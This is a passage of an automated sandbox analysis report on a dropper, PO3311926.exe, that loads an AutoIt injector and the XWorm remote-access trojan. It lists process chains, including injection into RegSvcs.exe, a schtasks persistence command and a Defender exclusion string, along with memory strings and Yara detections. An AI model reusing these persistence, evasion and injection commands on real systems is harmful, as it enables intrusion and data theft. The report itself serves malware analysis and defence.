Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\windows\system32\wldp.dlloc memstr_68fed33b-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\windows\system32\ntmarta.dll memstr_ced7edc8-1
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: heapdecommittotalfreethreshold4 memstr_d2213020-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: imagesubsystemmajorversionoldy memstr_40d49742-6
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: imagesubsystemminorversionexe memstr_79bb2735-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: majoroperatingsystemversion memstr_a2c7872b-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: readonlysharedmemoryheaponh memstr_f2a0d36a-9
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: heapdecommittotalfreethresholda memstr_3683d935-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: heapdecommitfreeblockthreshold~ memstr_b76b9c14-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: imagesubsystemmajorversionw memstr_17c30e68-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: heapdecommitfreeblockthresholdl memstr_dc5931cc-7
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: poptionalheaderimagebasenewe memstr_e09abb44-1
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: readonlysharedmemoryheapsholdr memstr_1cf7ca16-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: readimagefileexecoptionsshold memstr_97646e5c-9
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: readonlysharedmemorybaseon memstr_2aeec6ab-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hrt\se memstr_5dbaaffe-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: imagesubsystemminorversiony memstr_a4229e41-d
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: readonlystaticserverdatanold memstr_883880c2-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: r_<r_<@6p memstr_7217a792-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ioptionalheadersizeofheadersnew memstr_ec8ca2cb-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ioptionalheadersizeofimagenew memstr_86718e50-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: readimagefileexecoptions memstr_63cf842f-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: minoroperatingsystemversion memstr_2c94f8e8-9
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: readonlystaticserverdata memstr_b5703b2c-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: readonlysharedmemorybase memstr_c9b658e9-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: start.cmd" memstr_d4d1beea-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: settingsfn. memstr_c88a9791-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: install_folder! memstr_663e1706-1
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: byte[uctcreate8 memstr_2fe1499b-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: install_path3 memstr_c01e2a2f-7
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @echo off memstr_e0dd84b9-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: variables memstr_dc3caedc-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: install_folderi memstr_7257dd99-6
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ini_settingsfile, hidd` memstr_f6a107ea-6
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: install_folder{ memstr_00395157-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: disabletaskmgr\microsou memstr_64d8281f-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: variablesl memstr_d176d7b8-6
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \start.cmd^ memstr_8c9cfca2-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ini_settingseturn = trq memstr_d123d186-9
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: variablesnary memstr_1dce7744-d
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: startupdir memstr_15e26afd-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cmd_command_path memstr_bd94e64e-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: disabletaskmgr memstr_4b895928-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \start.cmd memstr_832abf10-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \mshta.exe memstr_9539e917-1
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wscript.quit memstr_7fbafc5b-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: install_foldercreateob memstr_6190afe8-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: variablesciiarray memstr_4476b9b8-d
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dword;int;dword;struct;ptr;int;int;int;ptr;endstruct, memstr_ef3387c4-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: const waitonreturn = true memstr_c8789ef7-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -command add-mppreference -exclusionpath memstr_9b7804f7-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dword pointertosymboltable;ebx; dword edx; dword ecx; { memstr_8444f224-6
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: word sizeofoptionalheader;j memstr_be4adb53-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: set wshshell = wscript.createobject(e memstr_3b80c087-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \microsoft.net\framework\v4.0.30319\applaunch.exet memstr_47f964cc-f
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dword addressofnewexeheadert64 p2home; uint64 p3home; memstr_b359621b-a
Contains functionality to simulate keystroke presses
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005FBB02 SendInput,keybd_event, 8_2_005FBB02
Contains functionality to simulate mouse events
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005FEBE5 mouse_event, 8_2_005FEBE5
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\PO3311926.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sdadbtvsh.bin nngqrvwq.xl Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin sdadbtvsh.bin nngqrvwq.xl Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "RegSvcs" /tr "C:\Users\user\AppData\Roaming\RegSvcs.exe" Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005F13F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 8_2_005F13F2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005F1EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 8_2_005F1EF3
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C36000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: sdadbtvsh.bin.exe, 00000014.00000003.1664995772.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1664923329.0000000000D94000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If WinGetText("Program Manager") = "0" ThenfE
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1597242290.0000000001734000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1599039739.0000000001739000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: sdadbtvsh.bin, sdadbtvsh.bin.exe Binary or memory string: Shell_TrayWnd
Source: sdadbtvsh.bin, 00000008.00000002.1603220411.00000000016C8000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1744085917.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1745967153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If WinGetText("Program Manager") = "0" Then
Source: nngqrvwq.xl.0.dr, nngqrvwq.xl.8.dr Binary or memory string: If WinGetText("Program Manager") = "0" Then

Language, Device and Operating System Detection
barindex
Yara detected Autoit Injector
Source: Yara match File source: 0000001A.00000003.1879240531.0000000001595000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.1664995772.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2205465079.0000000001757000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.1664923329.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2130760562.0000000001754000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2130668327.0000000001744000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: sdadbtvsh.bin PID: 3232, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: sdadbtvsh.bin.exe PID: 6064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: sdadbtvsh.bin.exe PID: 5308, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: sdadbtvsh.bin.exe PID: 5924, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\wrse\nngqrvwq.xl, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\RarSFX0\nngqrvwq.xl, type: DROPPED
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BBF654 cpuid 0_2_00BBF654
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\PO3311926.exe Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_00BBAF0F
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Queries volume information: C:\Users\user\AppData\Roaming\RegSvcs.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Queries volume information: C:\Users\user\AppData\Roaming\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Queries volume information: C:\Users\user\AppData\Roaming\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Queries volume information: C:\Users\user\AppData\Roaming\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Queries volume information: C:\Users\user\AppData\Roaming\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BBDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle, 0_2_00BBDF1E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005EE5F8 GetUserNameW, 8_2_005EE5F8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005CBCF2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 8_2_005CBCF2
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BAB146 GetVersionExW, 0_2_00BAB146
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: sdadbtvsh.bin.exe, 00000014.00000003.1752201411.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000002.1753734876.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1746299936.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1740437603.0000000000E35000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AVGUI.exe
Source: sdadbtvsh.bin.exe, 00000023.00000003.2205277299.0000000001793000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2206209315.0000000001795000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2208129774.00000000017B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: procexp.exe
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598450834.000000000175C000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1597242290.0000000001734000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598346984.000000000174F000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1954471926.0000000001608000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1953466654.00000000015E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information
barindex
Yara detected XWorm
Source: Yara match File source: 21.2.RegSvcs.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.sdadbtvsh.bin.exe.e6f650.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.sdadbtvsh.bin.exe.181df28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.sdadbtvsh.bin.17b6130.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.sdadbtvsh.bin.exe.166ebd0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.2166043970.0000000001832000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2160394335.000000000182A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.1557524427.00000000017C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.1916712063.0000000004046000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.1916641917.0000000001682000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.1565296596.00000000017FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.1557460063.00000000017FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
